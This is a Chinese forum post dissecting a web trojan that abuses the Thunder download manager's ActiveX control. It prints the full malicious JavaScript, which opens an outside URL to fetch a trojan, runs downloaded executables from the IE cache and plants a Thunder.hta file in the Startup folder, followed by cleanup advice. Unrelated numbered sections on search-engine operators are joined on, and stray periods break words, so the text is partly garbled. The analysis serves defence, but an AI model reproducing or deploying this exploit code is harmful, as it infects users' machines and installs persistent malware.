最近中了病毒的好像又多了

我就郁闷了，应该是3。4个月前的0Day吧，现在还流行？

找到了个，看看：

var Good_fan = null;

function shit()

{

try{Good_fan = new ActiveXObject("\x54\x68\x75\x6E\x64\x65\x72\x53\x65\x72\x76

\x65\x72\x2E\x77\x65\x62\x54\x68\x75\x6E\x64\x65\x72\x2E\x31");}

catch(e){return;}

var vip;

vip="<script defer> var shell=\"

<html>

<body>

<script>

window.moveTo(4000,4000);window.resizeTo(0,0);

var shell=new ActiveXObject(\\\"wscript.shell\\\");

shell.Run(\\\"C:\\\\\\\\Progra~1\\\\\\\\Intern~1\\\\\\\\IEXPLORE.EXE

http://news.163-stv.com/page/image/Downer.html\\\",0,0);

function runmm(){var path=shell.SpecialFolders(\\\"MyDocuments\\\");

var china=path.substring(0,path.lastIndexOf(\\\"\\\\\\\\\\\"));

china+=\\\"\\\\\\\\Local Settings\\\\\\\\Temporary Internet Files\\\\\\\\Content.IE5\\\\\\\\\\\";

var sp=new ActiveXObject(\\\"shell.application\\\");

var chenzi=sp.NameSpace(china);

for(i=0;

i<chenzi.Items().Count;

i++){var Folder=chenzi.Items().Item(i).path;Folder+=\\\"\\\\\\\\page[1].exe\\\";

try{shell.Exec(Folder);

}catch(e){};

}window.close();

};

shell.Run(\\\"cmd.exe /c tree c:\\\\\\\\ /f\\\",0,1);

runmm();

<\\/script>

</body>

</html>\";

var love = new ActiveXObject(\"ADODB.Recordset\");

love.Fields.Append(\"love\", 200, 3000);love.Open();

love.AddNew();

love.Fields(\"love\").Value=shell;love.Update();

love.Save(\"C:\\\\Documents and Settings\\\\All Users\\\\「开始」菜单\\\\程序\\\\启动\\\\Thunder.hta\",0);

love.Close();</script>";

var ret=Good_fan.AddCateogry(vip);

Good_fan.SetBrowserWindowSize(0,0,400,300);

var strps = Good_fan.GetServerPath();

strps = strps.substr(0, strps.length-1);

strps+="\\page\\index.htm";

Good_fan.SetBrowserWindowData(strps,"love");

Good_fan.HideBrowserWindow(1);

return;

}

try{Good_fan = new ActiveXObject("\x54\x68\x75\x6E\x64\x65\x72\x53\x65\x72\x76\x65

\x72\x2E\x77\x65\x62\x54\x68\x75\x6E\x64\x65\x72\x2E\x31");}

解密：

try{Good_fan = new ActiveXObject("ThunderServer.webThunder.1");}

嗯，应该是.判断是否存在WEB迅雷（控件）。

然后.调用IE连接hXXp://news.163-stv.com/page/image/Downer.html下载木马

并添加C:\Documents and Settings\All Users\「开始」菜单\程序\启动-Thunder.hta。

Thunder.hta，其实就是JS脚本，下载木马用的，不过那个木马现在失效了。

简单的解决方法是在开.始\程序\启动先删除Thunder.hta。

然后建立个名为Thunder.hta的文件夹(只读属性)，暂时缓解下```

治标治本的方法还是升级迅雷。。。。

PS：记得定时清空IE临时文件夹

6.利用baidu和google来搜索病毒信息
利用搜索引擎来搜索信息,现在许多的人都知道,但是利.用搜索语句搜索信息的人就少了,现在举列几个对个人用户查杀病毒有用的搜索语句.
以下为google语句的利用:
1:intext：关键字
把网页正文中某个关键字作为搜索的条件，在全球的网页里搜索含有此关键字的网页。 注篴llintext：关键字（功能是相同的）

2:intitle：关键字
把网页标题中的某个关键字作为.搜索条件，在全球的网页里搜索含有此关键字的网页。注：allintext：关键字（功能是相同的）

3:define:关键字
搜索关键字的定义.

注：图见原帖http://bbs.360safe.com/viewthread.php?tid=327603&extra=page=1

以上红色的字体为搜索的关键字,大家也可以利用””来将字符定义为字符串,这里就不演示了.

7.利用论坛和个人博客收集资料
有些论坛拥有搜索功能,利用它.们可以得到解决和未解决的病毒信息选取关键字再次搜索.
个人博客是个很好的资料搜集地点,浏览专家们的博客更能获得专业的知识,还能了解到这个领域的最新信息
PS:骇客们也经常浏览防病毒专家的博客来修改自己的木马程序.

文章是面向那些对网络安全还不是很了解的朋友的,高手请不要见笑.